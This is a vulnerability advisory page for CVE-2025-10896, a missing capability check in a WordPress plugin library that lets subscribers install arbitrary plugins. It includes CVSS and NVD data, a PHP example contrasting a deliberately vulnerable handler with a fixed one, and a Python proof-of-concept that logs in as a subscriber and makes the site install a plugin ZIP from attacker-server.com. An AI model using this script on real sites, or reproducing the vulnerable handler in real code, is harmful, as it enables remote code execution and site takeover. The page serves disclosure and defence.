Security Vulnerability Report
CVE-2025-10896 CVSS 8.8 HIGH

CVE-2025-10896

Published: 2025-11-04 05:15:49
Last Modified: 2026-04-15 00:35:42

Description

Multiple plugins for WordPress with the Jewel Theme Recommended Plugins Library are vulnerable to Unrestricted Upload of File with Dangerous Type via arbitrary plugin installation in all versions up to, and including, 1.0.2.3. This is due to missing capability checks on the '*_recommended_upgrade_plugin' function which allows arbitrary plugin URLs to be installed. This makes it possible for authenticated attackers with subscriber-level access and above to upload arbitrary plugin packages to the affected site's server via a crafted plugin URL, which may make remote code execution possible.
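The defect the description names is a missing authorization check (CWE-862) on an AJAX handler that installs a plugin from a caller-supplied URL. The PHP below is an added illustration written for this report, not the Jewel Theme library's own code: the `example_*` function and action names are hypothetical placeholders, the allow-list slugs are taken from the affected-product list on this page, and the WordPress APIs used (`current_user_can()`, `check_ajax_referer()`, `plugins_api()`, `Plugin_Upgrader`) are real core functions. It shows the vulnerable shape beside a hardened handler.

```php
<?php
// Added illustration for CVE-2025-10896 (not the plugin library's actual code).
// Hook names, function names and the allow-list are hypothetical placeholders.

// --- Vulnerable shape (CWE-862: missing authorization).
// Every wp_ajax_* action is reachable by ANY logged-in user through
// /wp-admin/admin-ajax.php, so without a capability check a subscriber can
// reach the install code path. The caller also controls the package URL.
function example_upgrade_plugin_vulnerable() {
    $plugin_url = isset( $_POST['plugin_url'] )
        ? esc_url_raw( wp_unslash( $_POST['plugin_url'] ) )
        : '';

    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // No current_user_can() and no nonce: arbitrary ZIP is installed as a plugin.
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $upgrader->install( $plugin_url );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_upgrade_plugin_vulnerable', 'example_upgrade_plugin_vulnerable' );

// --- Hardened shape.
function example_upgrade_plugin_fixed() {
    // 1. Authorization: only users who may install plugins (administrators on a
    //    single site, super admins on multisite) may continue. wp_send_json_error()
    //    calls wp_die(), so execution stops here on failure.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 2. CSRF protection: the request must carry a nonce for this action in the
    //    'nonce' field; check_ajax_referer() dies on mismatch.
    check_ajax_referer( 'example_upgrade_plugin', 'nonce' );

    // 3. Never accept an arbitrary package URL. Resolve a slug against a fixed
    //    allow-list and let WordPress fetch the package from the official directory.
    $allowed_slugs = array(
        'image-hover-effects-elementor-addon',
        'image-comparison-elementor-addon',
    );
    $slug = isset( $_POST['plugin_slug'] ) ? sanitize_key( wp_unslash( $_POST['plugin_slug'] ) ) : '';
    if ( ! in_array( $slug, $allowed_slugs, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown plugin.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // plugins_api() returns the directory's metadata, including the download link
    // for the package WordPress.org serves for this slug.
    $api = plugins_api(
        'plugin_information',
        array( 'slug' => $slug, 'fields' => array( 'sections' => false ) )
    );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( array( 'message' => $api->get_error_message() ), 502 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );
    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( array( 'message' => 'Install failed.' ), 500 );
    }
    wp_send_json_success( array( 'slug' => $slug ) );
}
add_action( 'wp_ajax_example_upgrade_plugin', 'example_upgrade_plugin_fixed' );
```

The ordering matters for review: the capability check comes first because `admin-ajax.php` authenticates but does not authorize, which is exactly why the advisory's impact starts at subscriber level. The nonce alone would not close the hole (a subscriber can obtain their own nonce), and the allow-list removes the attacker-controlled URL that makes the issue an arbitrary file upload rather than a mere privilege problem.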

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Jewel Theme Recommended Plugins Library <= 1.0.2.3
image-hover-effects-elementor-addon <= 1.0.2.3
image-comparison-elementor-addon <= 1.0.2.3
All other WordPress plugins that bundle this plugin library <= 1.0.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-10896 PoC - WordPress Plugin Library Arbitrary Plugin Installation
# Target: WordPress sites with vulnerable Jewel Theme Recommended Plugins Library

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# Malicious plugin URL (attacker-controlled)
malicious_plugin_url = "http://attacker-server.com/malicious-plugin.zip"

# Authentication with subscriber-level account
session = requests.Session()
login_data = {
    "log": "subscriber_user",
    "pwd": "subscriber_password",
    "wp-submit": "Log In",
}

# Step 1: Authenticate as subscriber
login_response = session.post(f"{target_url}/wp-login.php", data=login_data)
if "wordpress_logged_in" not in str(session.cookies):
    print("[-] Authentication failed")
    sys.exit(1)
print("[+] Authenticated as subscriber")

# Step 2: Exploit the arbitrary plugin installation vulnerability
# The vulnerable endpoint varies by plugin, commonly:
exploit_endpoints = [
    "/wp-admin/admin-ajax.php",
    "/wp-admin/admin.php?page=recommended",
]

for endpoint in exploit_endpoints:
    exploit_data = {
        "action": "image_hover_recommended_upgrade_plugin",  # or similar action
        "plugin_url": malicious_plugin_url,
        "plugin_slug": "malicious-plugin",
    }
    response = session.post(f"{target_url}{endpoint}", data=exploit_data)
    if response.status_code == 200:
        print(f"[+] Exploit sent via {endpoint}")
        print(f"[+] Response: {response.text[:200]}")
        break

print("\n[!] If successful, the malicious plugin is now installed and active")
print("[!] Attacker can now execute arbitrary code via the malicious plugin")
```

References

Weakness: CWE-862 (Missing Authorization)

https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Assets.php#L70
https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Recommended.php#L334
https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Recommended.php#L43
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3384308%40image-hover-effects-elementor-addon&new=3384308%40image-hover-effects-elementor-addon
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389322%40image-comparison-elementor-addon&new=3389322%40image-comparison-elementor-addon
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389341%40content-locker-for-elementor&new=3389341%40content-locker-for-elementor&sfp_email=&sfph_mail=
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3390374%40ultimate-blocks-for-gutenberg&new=3390374%40ultimate-blocks-for-gutenberg&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/0ff3a292-3924-4823-867a-fedb2c1cdd00?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10896",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-04T05:15:49.360",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Multiple plugins for WordPress with the Jewel Theme Recommended Plugins Library are vulnerable to Unrestricted Upload of File with Dangerous Type via arbitrary plugin installation in all versions up to, and including, 1.0.2.3. This is due to missing capability checks on the '*_recommended_upgrade_plugin' function which allows arbitrary plugin URLs to be installed. This makes it possible for authenticated attackers with subscriber-level access and above to upload arbitrary plugin packages to the affected site's server via a crafted plugin URL, which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Assets.php#L70",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Recommended.php#L334",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Recommended.php#L43",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3384308%40image-hover-effects-elementor-addon&new=3384308%40image-hover-effects-elementor-addon",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389322%40image-comparison-elementor-addon&new=3389322%40image-comparison-elementor-addon",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389341%40content-locker-for-elementor&new=3389341%40content-locker-for-elementor&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3390374%40ultimate-blocks-for-gutenberg&new=3390374%40ultimate-blocks-for-gutenberg&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0ff3a292-3924-4823-867a-fedb2c1cdd00?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```